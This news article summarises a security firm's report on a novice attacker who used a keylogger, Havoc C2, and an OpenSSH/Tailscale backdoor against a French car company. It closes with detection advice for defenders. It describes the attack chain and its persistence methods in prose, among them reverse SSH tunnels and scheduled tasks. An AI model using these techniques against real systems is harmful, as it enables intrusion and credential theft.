A French-speaking hacker infiltrated a small French automotive company, deployed a keylogger, and made off with banking and email login details.
Nothing unusual there — until one particular step near the end of the attack changed everything.
Just before his command-and-control server was shut down, he installed OpenSSH and Tailscale on a compromised machine, creating an alternative access route that bypassed the C2 entirely. When the Havoc server went offline the following day, his connection to the victim’s system remained intact. Eighteen days later, when the C2 came back online, his agents reconnected on their own, and he simply picked up where he left off.
Cato Networks documented the entire operation command by command — 339 commands across 33 days — after the attacker accidentally left his SSH keys and a detailed step-by-step guide in a publicly accessible storage bucket. The analysis, published Tuesday by Cato CTRL researcher Vitaly Simonovich, offers a rare window into an intrusion seen through the attacker’s own keystrokes rather than through post-incident forensic artifacts.
The researchers’ takeaway is stark: taking down a C2 server does not equal remediation if the attacker has already established a separate backdoor.
The threat actor, who goes by the handle “Poisson,” is not an advanced persistent threat. Researchers describe a novice operator who appears to work around a school schedule, active after 3 p.m. CET with a long break in the middle of the day. Everything ran on free-tier infrastructure: DuckDNS, Backblaze B2, and a low-cost IONOS VPS hosted in Berlin. His operational security was weak.
He exposed his home directory five times, named his storage buckets after his own handle, and left a test file containing his own repeated keystrokes inside the keylogger package. He failed at roughly half of what he attempted. Still, he managed to compromise four machines.
The attack chain
The malware operated almost entirely in memory. A VBScript stager with a sandbox-evasion delay decrypted a PowerShell loader, which then fetched a .NET loader that executed Havoc’s Demon agent without ever writing the implant to disk. For privilege escalation, he used Start-Process -Verb RunAs — not a silent UAC bypass. It triggers the Windows consent prompt and waits for a user to click Yes. On one victim machine, it took twelve attempts over two days before someone approved it.
After gaining elevated access, he cemented his foothold: a scheduled task configured to run at every logon with the highest privileges, shellcode injected into Explorer.exe, and a custom-compiled RustDesk binary serving as a backup communication channel. The credential harvester was a 70-line Python keylogger that saved keystrokes to a local file, with no beacon and no exfiltration server. Poisson simply logged in, retrieved the file manually, and ran powercfg to prevent the machines from going to sleep, ensuring the credential collection never paused.
The critical maneuver
On April 7, during a five-hour overnight session, he installed OpenSSH Server and Tailscale, connected the victim’s machine to his private Tailscale network, and configured key-based SSH authentication along with a reverse tunnel. This gave him the ability to reach the machine through Tailscale’s encrypted mesh network — no C2 required, no exposed ports needed.
The following day, the Havoc infrastructure went dark. Cato did not disclose the reason, and it hardly matters: the Tailscale pathway existed on an entirely separate network, so the access survived.
When the C2 was restored on April 26, the agents reconnected automatically with no need to re-compromise the machines. Over the final five days, he executed 145 additional commands, probed smart-card and certificate stores — suggesting he was targeting certificate-based authentication — ran two unidentified executables from an archive named Thales.zip for roughly 32 minutes total, then deleted 17 files and went silent on May 1.
His objectives were narrowly focused. There was no Mimikatz, no lateral movement across the network, no ransomware, and no indication he exfiltrated the documents he browsed — ranging from tax records to insurance files. He was only after what people type: banking credentials, email passwords, government portal logins. For a small business owner, that translates directly into financial risk.
None of the tools involved are novel, which is precisely the point. China’s APT31 leveraged Tailscale throughout 2024 and 2025 to quietly tunnel out of Russian IT companies. Scattered Spider has relied on legitimate remote-access utilities like Ngrok and Fleetdeck. And RustDesk, Poisson’s backup channel, has appeared in recent Akira ransomware campaigns.
The binaries are digitally signed and entirely legitimate, so detection strategies that focus on malicious files rather than malicious behavior will miss them entirely. What Poisson’s case adds is command-level evidence that this technique survives a takedown — demonstrated by an attacker who was clearly still learning on the job.
What to monitor
Cato’s detection recommendations are specific:
- Trigger an alert when OpenSSH Server is installed on a Windows workstation — this is rarely legitimate in that context.
- Watch for tailscale.exe on machines that have no business running a VPN client.
- Look for ssh -R reverse tunnels connecting to external hosts.
- Check for wscript.exe executing .vbs files from user staging directories.
- Flag scheduled tasks configured with the highest privileges that launch script interpreters.
- Monitor for powercfg standby-timeout modifications that keep machines from entering sleep mode.
- Block DuckDNS domains.
The broader lesson: when you discover a C2, assume it is not the only entry point, and actively search for the quiet persistence layer operating behind it.
What was inside Thales.zip, and what those two programs actually did during their 32 minutes on the machine, is the question Cato leaves unanswered. The more important realization is this: the C2 was never the intrusion itself — it was merely one pathway into it. Shut it down while leaving OpenSSH, Tailscale, the scheduled task, and the keylogger intact, and the attacker still has a way back in.
That is the part remediation efforts keep getting wrong.
